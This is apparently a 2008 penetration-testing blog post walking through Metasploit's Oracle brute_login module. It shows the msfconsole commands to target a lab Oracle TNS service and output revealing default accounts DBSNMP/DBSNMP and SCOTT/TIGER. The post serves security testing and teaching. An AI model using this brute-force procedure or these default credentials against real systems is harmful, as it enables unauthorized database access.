carnal0wnage [Shared Reader]

Saturday, November 22, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 4

Thank MC for this one...

http://metasploit.com/users/mc/oracle9i/brute_login.rb

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130

RHOST => 172.16.102.130

msf auxiliary(brute_login) > info


Name: Oracle bruteforcer for known default accounts.

Version: $Revision:$


Provided by:
MC


Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 172.16.102.130 yes The Oracle host.

RPORT 1521 yes The TNS port.

SID DEMO yes The sid to authenticate with.


Description:

This module uses a list of well known authentication credentials for
bruteforcing the TNS service.

msf auxiliary(brute_login) > set SID unbreakable

SID => unbreakable

msf auxiliary(brute_login) > run

[*] Found user/pass of: DBSNMP/DBSNMP...
[*] Found user/pass of: SCOTT/TIGER...
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >

No comments: